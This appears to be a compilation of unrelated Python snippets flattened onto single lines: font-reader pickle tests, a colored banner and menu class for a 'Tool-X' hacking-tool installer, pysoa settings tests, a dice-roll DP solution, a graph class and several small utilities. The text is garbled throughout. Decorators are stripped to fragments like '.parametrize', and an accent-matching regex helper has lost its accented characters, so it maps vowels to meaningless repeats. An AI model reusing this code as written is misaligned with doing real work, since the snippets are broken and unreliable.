class SFNTReaderTest(): .parametrize('deepcopy', [copy.deepcopy, pickle_unpickle]) def test_pickle_protocol_FileIO(self, deepcopy, tmp_path): fontfile = (tmp_path / 'test.ttf') fontfile.write_bytes(EMPTY_SFNT) reader = SFNTReader(fontfile.open('rb')) reader2 = deepcopy(reader) assert (reader2 is not reader) assert (reader2.file is not reader.file) assert isinstance(reader2.file, io.BufferedReader) assert isinstance(reader2.file.raw, io.FileIO) assert (reader2.file.name == reader.file.name) assert (reader2.file.tell() == reader.file.tell()) for (k, v) in reader.__dict__.items(): if (k == 'file'): continue assert (getattr(reader2, k) == v) .parametrize('deepcopy', [copy.deepcopy, pickle_unpickle]) def test_pickle_protocol_BytesIO(self, deepcopy, tmp_path): buf = io.BytesIO(EMPTY_SFNT) reader = SFNTReader(buf) reader2 = deepcopy(reader) assert (reader2 is not reader) assert (reader2.file is not reader.file) assert isinstance(reader2.file, io.BytesIO) assert (reader2.file.tell() == reader.file.tell()) assert (reader2.file.getvalue() == reader.file.getvalue()) for (k, v) in reader.__dict__.items(): if (k == 'file'): continue assert (getattr(reader2, k) == v)
class logo(): def tool_header(self): print(f''' {yellow} _____ _ __ __ |_ _|__ ___ | | \ \/ / | |/ _ \ / _ \| |____\ / | | (_) | (_) | |____/ \ |_|\___/ \___/|_| /_/\_\ {purple}v2.1 {cyan} {yellow}| Install Best Hacking Tool | {cyan} {nc}''') def tool_footer(self): print(f'''{cyan}_______________________________________________ {nc}''') def not_ins(self): self.tool_header() print(f''' {cyan} [ + ] {red}We can't install Tool-X. {cyan} [ + ] {red}There are some error. {cyan} [ + ] {red}Please try again after some time!''') self.tool_footer() def ins_tnc(self): self.tool_header() print(f''' {yellow} [ + ] {green}Use It At Your Own Risk. {yellow} [ + ] {green}No Warranty. {yellow} [ + ] {green}Use it legal purpose only. {yellow} [ + ] {green}We are not responsible for your actions. {yellow} [ + ] {green}Do not do things that are forbidden. {red} If you are installing this tool. that means you are agree with all terms.''') self.tool_footer() def ins_sc(self): self.tool_header() print(f''' {yellow} [ + ] {green}Tool-X installed successfully. {yellow} [ + ] {green}To run Tool-X, {yellow} [ + ] {green}Type Tool-X in your terminal.''') self.tool_footer() def update(self): self.tool_header() print(f''' {yellow} [ 1 ] {green}Update your Tool-X. {yellow} [ 0 ] {green}For Back.{nc}''') self.tool_footer() def updated(self): self.tool_header() print(f''' {yellow} [ + ] {green}Tool-X Updated Successfully. {yellow} [ + ] {green}Press Enter to continue.{nc}''') self.tool_footer() def nonet(self): self.tool_header() print(f''' {cyan} [ + ] {red}No network connection? {cyan} [ + ] {red}Are you offline? {cyan} [ + ] {red}Please try again after some time.{nc}''') self.tool_footer() def update_error(self): self.tool_header() print(f''' {red} [ + ] {red}We can't Update Tool-X. {red} [ + ] {red}Please try again after some time.{nc}''') self.tool_footer() def about(self, total): self.tool_header() print(f''' {yellow} [+] Tool Name :- {green}Tool-X {yellow} [+] Latest Update :- {green}23/3/2019. {yellow} [+] Tools :- {green}total {total} tools. {yellow} [+] {green}Tool-x is automatic tool installer. {yellow} [+] {green}Made for termux and linux based system. {red} [+] Note :- Use this tool at your own risk.''') self.tool_footer() def install_tools(self): print(f'''{yellow} {green}|_____________ Select your tool ______________| {yellow}{nc}''') def already_installed(self, name): self.tool_header() print(f''' {yellow} [ + ] {green}Sorry ?? {yellow} [ + ] {violate}'{name}'{green} is already Installed !! ''') self.tool_footer() def installed(self, name): self.tool_header() print(f''' {yellow} [ + ] {green}Installed Successfully !! {yellow} [ + ] {violate}'{name}'{green} is Installed Successfully !! ''') self.tool_footer() def not_installed(self, name): self.tool_header() print(f''' {yellow} [ + ] {red}Sorry ?? {yellow} [ + ] {violate}'{name}'{red} is not installed !! ''') self.tool_footer() def back(self): print(f''' {yellow}| 00) Back | {nc}''') def updating(self): print(f'''{yellow} {green}|______________ Updating Tool-X ______________| {yellow}{nc}''') def installing(self): print(f'''{yellow} {green}|________________ Installing _________________| {yellow}{nc}''') def menu(self, total): self.tool_header() print(f''' {yellow} [ 1 ] {green}Show all tools.{yellow} [ {purple}{total} tools{yellow} ] {yellow} [ 2 ] {green}Tools Category. {yellow} [ 3 ] {green}Update Tool-X. {yellow} [ 4 ] {green}About Us. {yellow} [ x ] {green}For Exit.''') self.tool_footer() def exit(self): self.tool_header() print(f''' {yellow} [ + ] {green}Thanks for using Tool-X {yellow} [ + ] {green}Good Bye.....! ){nc}''') self.tool_footer()
def filter_ips_decoder_data(json): option_list = ['name', 'parameter'] json = remove_invalid_fields(json) dictionary = {} for attribute in option_list: if ((attribute in json) and (json[attribute] is not None)): dictionary[attribute] = json[attribute] return dictionary
def test_feed_forward_convolution_block(): in_dict = build_input_dict(dims=[100, 3, 64, 64]) net: VGGConvolutionBlock = VGGConvolutionBlock(in_keys='in_key', out_keys='out_key', in_shapes=(3, 64, 64), hidden_channels=[4, 8, 16], non_lin=nn.ReLU) str(net) out_dict = net(in_dict) assert isinstance(out_dict, Dict) assert set(net.out_keys).issubset(set(out_dict.keys())) assert (net.output_channels == 16) assert (out_dict[net.out_keys[0]].shape[(- 3)] == net.output_channels) assert (out_dict[net.out_keys[0]].shape == (100, 16, 8, 8)) assert (net.out_shapes() == [out_dict[net.out_keys[0]].shape[(- 3):]])
def test(): assert ('spacy.blank("fr")' in __solution__), 'As-tu cree le modele francais vierge ?' assert ('DocBin(docs=docs)' in __solution__), "As-tu cree correctement l'objet DocBin ?" assert ('doc_bin.to_disk(' in __solution__), 'As-tu utilise la methode to_disk?' assert ('train.spacy' in __solution__), 'As-tu bien nomme le fichier correctement ?' __msg__.good('Bien joue ! Maintenant nous pouvons entrainer le modele.')
class StatsdMixin(metaclass=abc.ABCMeta): def statsd_prefix(self): pass def mon_con(self): if (self.__mon_con is None): self.__mon_con = statsd.StatsClient(host=config.C_GRAPHITE_DB_IP, port=8125, prefix=self.statsd_prefix) return self.__mon_con def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.__mon_con = None
def navigate_trace_frames(session: Session, initial_trace_frames: List[TraceFrameQueryResult], sources: Set[str], sinks: Set[str], index: int=0) -> List[Tuple[(TraceFrameQueryResult, int)]]: leaf_lookup = LeafLookup.create(session) if (not initial_trace_frames): return [] trace_frames = [(initial_trace_frames[index], len(initial_trace_frames))] visited_ids: Set[int] = {int(initial_trace_frames[index].id)} while (not trace_frames[(- 1)][0].is_leaf()): (trace_frame, branches) = trace_frames[(- 1)] if (trace_frame.kind == TraceKind.POSTCONDITION): leaf_kind = sources elif (trace_frame.kind == TraceKind.PRECONDITION): leaf_kind = sinks else: assert ((trace_frame.kind == TraceKind.POSTCONDITION) or (trace_frame.kind == TraceKind.PRECONDITION)) next_nodes = next_frames(session, trace_frame, leaf_kind, visited_ids, leaf_lookup=leaf_lookup) if (len(next_nodes) == 0): trace_frames.append((TraceFrameQueryResult(id=DBID(0), callee=trace_frame.callee, callee_port=trace_frame.callee_port, caller='', caller_port=''), 0)) return trace_frames visited_ids.add(int(next_nodes[0].id)) trace_frames.append((next_nodes[0], len(next_nodes))) return trace_frames
def _recurse_callables(val: _T, fnc: Callable, check_type: Type=str): if isinstance(val, (list, List, tuple, Tuple)): out = [] for v in val: if isinstance(val, (list, List, tuple, Tuple, dict, Dict)): out.append(_recurse_callables(v, fnc, check_type)) else: out.append(fnc(v)) out = type(val)(out) elif isinstance(val, (dict, Dict)): out = {} for (k, v) in val.items(): if isinstance(val, (list, List, tuple, Tuple, dict, Dict)): out.update({k: _recurse_callables(v, fnc, check_type)}) else: out.update({k: fnc(v)}) elif isinstance(val, check_type): out = fnc(val) else: out = val return out
class TestSOASettings(unittest.TestCase): def test_classes_converted(self): settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.client:RedisClientTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}, 'middleware': [{'path': 'pysoa.client.middleware:ClientMiddleware'}]} settings = SOASettings(settings_dict) assert (settings['transport']['object'] == RedisClientTransport) assert (settings['middleware'][0]['object'] == ClientMiddleware) def test_client_settings(self): settings_dict = {'test_service': {'transport': {'path': 'pysoa.common.transport.redis_gateway.client:RedisClientTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD, 'default_serializer_config': {'path': 'pysoa.common.serializer:JSONSerializer'}}}}} client = Client(settings_dict) handler = client._get_handler('test_service') assert isinstance(handler.transport, RedisClientTransport) assert (handler.transport._send_queue_name == 'service.test_service') assert isinstance(handler.transport.core, RedisTransportCore) assert (handler.transport.core.backend_type == REDIS_BACKEND_TYPE_STANDARD) assert isinstance(handler.transport.core.default_serializer, JSONSerializer) def test_server_settings(self): class _TestServer(Server): service_name = 'geo_tag' settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.server:RedisServerTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD, 'default_serializer_config': {'path': 'pysoa.common.serializer:JSONSerializer'}}}} server = _TestServer(ServerSettings(settings_dict)) assert isinstance(server.transport, RedisServerTransport) assert (server.transport._receive_queue_name == 'service.geo_tag') assert isinstance(server.transport.core, RedisTransportCore) assert (server.transport.core.backend_type == REDIS_BACKEND_TYPE_STANDARD) assert isinstance(server.transport.core.default_serializer, JSONSerializer) def test_server_settings_generic_with_defaults(self): class _TestServer(Server): service_name = 'tag_geo' settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.server:RedisServerTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}} server = _TestServer(ServerSettings(settings_dict)) assert isinstance(server.transport, RedisServerTransport) assert (server.transport._receive_queue_name == 'service.tag_geo') assert isinstance(server.transport.core, RedisTransportCore) assert (server.transport.core.backend_type == REDIS_BACKEND_TYPE_STANDARD) assert isinstance(server.transport.core.default_serializer, MsgpackSerializer) def test_server_settings_fails_with_client_transport(self): settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.client:RedisClientTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}} with pytest.raises(Settings.ImproperlyConfigured) as error_context: ServerSettings(settings_dict) assert ('is not one of or a subclass of one of' in error_context.value.args[0]) def test_client_settings_fails_with_server_transport(self): settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.server:RedisServerTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}} with pytest.raises(Settings.ImproperlyConfigured) as error_context: ClientSettings(settings_dict) assert ('is not one of or a subclass of one of' in error_context.value.args[0]) assert ('RedisServerTransport' in error_context.value.args[0]) def test_client_settings_fails_with_invalid_path(self): settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.server:NonExistentTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}} with pytest.raises(Settings.ImproperlyConfigured) as error_context: ClientSettings(settings_dict) assert ('has no attribute' in error_context.value.args[0]) assert ('NonExistentTransport' in error_context.value.args[0]) def test_server_settings_fails_with_invalid_serializer(self): settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.server:RedisServerTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD, 'default_serializer_config': {'path': 'pysoa.server.middleware:ServerMiddleware'}}}} with pytest.raises(Settings.ImproperlyConfigured) as error_context: ServerSettings(settings_dict) assert ('is not one of or a subclass of one of' in error_context.value.args[0]) assert ('ServerMiddleware' in error_context.value.args[0]) def test_server_settings_fails_with_client_middleware(self): settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.server:RedisServerTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}, 'middleware': [{'path': 'pysoa.client.middleware:ClientMiddleware'}]} with pytest.raises(Settings.ImproperlyConfigured) as error_context: ServerSettings(settings_dict) assert ('is not one of or a subclass of one of' in error_context.value.args[0]) assert ('ClientMiddleware' in error_context.value.args[0]) settings_dict['middleware'][0]['path'] = 'pysoa.server.middleware:ServerMiddleware' ServerSettings(settings_dict) def test_client_settings_fails_with_server_middleware(self): settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.client:RedisClientTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}, 'middleware': [{'path': 'pysoa.server.middleware:ServerMiddleware'}]} with pytest.raises(Settings.ImproperlyConfigured) as error_context: ClientSettings(settings_dict) assert ('is not one of or a subclass of one of' in error_context.value.args[0]) assert ('ServerMiddleware' in error_context.value.args[0]) settings_dict['middleware'][0]['path'] = 'pysoa.client.middleware:ClientMiddleware' ClientSettings(settings_dict)
def replace_vowels_with_accented_regex(text): text = text.replace('a', '[aaaaaaaaa]') text = text.replace('u', '[uuuuuu]') text = text.replace('o', '[oooooo]') text = text.replace('e', '[eeeeeeee]') text = text.replace('i', '[iiiiiii]') text = text.replace('y', '[yyyyy]') text = text.replace('A', '[AAAAAAAA]') text = text.replace('U', '[UUUUUU]') text = text.replace('O', '[OOOOOO]') text = text.replace('E', '[EEEEEEEE]') text = text.replace('I', '[IIIIIII]') text = text.replace('Y', '[YYYYY]') return text
class Solution(): def numRollsToTarget(self, n: int, k: int, target: int) -> int: if ((target < n) or (target > (n * k))): return 0 MOD = ((10 ** 9) + 7) M = (1 + max(k, target)) prev = ([0] * M) for j in range(1, (k + 1)): prev[j] = 1 for i in range(1, n): curr = ([0] * M) prevSum = 0 for j in range(1, M): prevSum += (prev[(j - 1)] - (0 if (((j - k) - 1) <= 0) else prev[((j - k) - 1)])) prevSum %= MOD curr[j] = prevSum prev = curr return prev[target]
class Graph(): def __init__(self): self.vertices = set() self.names = {} self.uid_counter = 0 def get_next_uid(self): self.uid_counter += 1 return self.uid_counter def get_named_vertex(self, name): assert isinstance(name, str) if (name not in self.names): raise ICE(('attempted to get named vertex %s that does not exists' % name)) return self.names[name] def add_edge(self, src, dst): assert isinstance(src, Vertex_Root) assert isinstance(dst, Vertex_Root) assert (src.graph == self) assert (dst.graph == self) src.out_edges.add(dst) dst.in_edges.add(src) def remove_edge(self, src, dst): assert isinstance(src, Vertex_Root) assert isinstance(dst, Vertex_Root) assert (src.graph == self) assert (dst.graph == self) if (dst in src.out_edges): src.out_edges.remove(dst) dst.in_edges.remove(src) def debug_write_dot(self, filename): with open((filename + '.dot'), 'w', encoding='UTF-8') as fd: fd.write('digraph G {\n') for vert in sorted(self.vertices): fd.write((' %u [label="%s"];\n' % (vert.uid, vert.dot_label()))) fd.write('\n') for src in sorted(self.vertices): for dst in sorted(src.out_edges): fd.write((' %u -> %u;\n' % (src.uid, dst.uid))) fd.write('}\n') def debug_write_pdf(self, filename): self.debug_write_dot(filename) os.system(('dot -Tpdf -o%s.pdf %s.dot' % (filename, filename))) def count_vertices(self): return len(self.vertices) def count_edges(self): return sum((len(v.out_edges) for v in self.vertices))
('image-caption') def image_caption(dataset, images_path): stream = Images(images_path) blocks = [{'view_id': 'image'}, {'view_id': 'text_input', 'field_id': 'caption', 'field_autofocus': True}] return {'dataset': dataset, 'stream': stream, 'view_id': 'blocks', 'config': {'blocks': blocks}}
def test_offset_with_parsable_string_connector_param_reference(response_with_body): config = OffsetPaginationConfiguration(incremental_param='page', increment_by=1, limit={'connector_param': 'limit'}) connector_params = {'limit': '10'} request_params: SaaSRequestParams = SaaSRequestParams(method=HTTPMethod.GET, path='/conversations', query_params={'page': 1}) paginator = OffsetPaginationStrategy(config) next_request: Optional[SaaSRequestParams] = paginator.get_next_request(request_params, connector_params, response_with_body, 'conversations') assert (next_request == SaaSRequestParams(method=HTTPMethod.GET, path='/conversations', query_params={'page': 2}))